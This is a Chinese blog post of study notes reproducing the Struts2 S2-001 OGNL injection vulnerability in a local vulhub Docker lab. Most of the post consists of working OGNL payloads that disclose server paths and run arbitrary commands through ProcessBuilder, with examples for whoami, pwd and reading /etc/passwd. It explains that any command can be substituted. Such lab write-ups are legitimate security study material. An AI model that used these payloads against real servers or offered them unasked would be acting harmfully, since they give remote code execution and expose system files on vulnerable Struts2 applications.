0
点赞
收藏
分享

微信扫一扫

Struts2漏洞S2-001复现

梦为马 2022-03-30 阅读 48
学习安全web安全

Struts2 漏洞S2-001复现学习笔记

S2-001复现

原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。

漏洞环境搭建

https://github.com/vulhub/vulhub/tree/master/struts2/s2-001

运行以下命令进行设置

docker-compose build
docker-compose up -d

访问 http://127.0.0.1:8080/
在这里插入图片描述

漏洞poc测试

1.输入**%{‘123’}**,sumbit
在这里插入图片描述

2.返回123,参数值,证明漏洞存在
在这里插入图片描述

构造poc

  1. 获取tomcat路径:

    %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

在这里插入图片描述

语句执行后,查看返回的语句信息:
在这里插入图片描述

  1. 获取网站真实路径:

    %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

在这里插入图片描述
在这里插入图片描述

  1. 构造查看权限的poc:

    %{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

在这里插入图片描述

  1. 执行任意命令只需要将上面的poc中whoami替换:

    %{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),

#f.getWriter().close()

}

在这里插入图片描述

  1. 执行命令(带参数的命令:new java.lang.String[]{"cat","/etc/passwd"}):

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

在这里插入图片描述

关闭docker环境

命令:docker-compose down -v
举报

相关推荐

Apache Struts2漏洞复现之s2-001漏洞复现

inscode前端vue3typescriptvite

Struts2漏洞学习(s2-001——s2-009)

javastruts2网络安全

S2-001漏洞靶场复现

渗透测试靶机web安全

Struts2漏洞漏洞合集复现学习笔记

学习web安全安全

复现awvs——Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution(Struts2漏洞)

网络安全渗透测试

Struts2 漏洞集合

安全web安全网络安全渗透测试安全漏洞

struts2远程S2-009复现学习

学习网络linux

struts2远程S2-013复现学习

学习安全web安全

墨者Apache Struts2远程代码执行漏洞(S2-004)复现题解

安全

墨者Apache Struts2远程代码执行漏洞(S2-029)复现题解

安全
0 条评论